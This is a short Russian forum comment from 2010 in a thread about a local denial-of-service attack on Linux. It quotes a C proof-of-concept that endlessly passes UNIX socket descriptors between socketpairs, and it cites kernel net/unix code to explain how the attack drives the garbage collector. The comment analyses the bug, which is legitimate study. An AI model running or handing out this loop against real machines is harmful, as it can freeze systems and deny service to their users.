Исходное сообщение
"Новый способ совершения локальной DoS-атаки в Linux" Отправлено Аноним, 26-Ноя-10 18:50
позволю себе напомнить код "эксплойта" int main () {   int fd[2], ff[2];   int target;   if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, fd)==-1)     return 1;   for (;;)   {     if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff)==-1)     return 2;     send_fd (ff[0], fd[0]);     send_fd (ff[0], fd[1]);     close (fd[1]); <<< это что ?     close (fd[0]); <<< и вот это ?     fd[0] = ff[0];     fd[1] = ff[1];   } } если хорошо посмотрим в код net/unix static int unix_release_sock(struct sock *sk, int embrion) { ...         if (unix_tot_inflight)                 unix_gc();              /* Garbage collect fds */         return 0; } unix_release { unix_release_sock(). } .. static const struct proto_ops unix_stream_ops = {         .family =       PF_UNIX,         .owner =        THIS_MODULE,         .release =      unix_release, .. }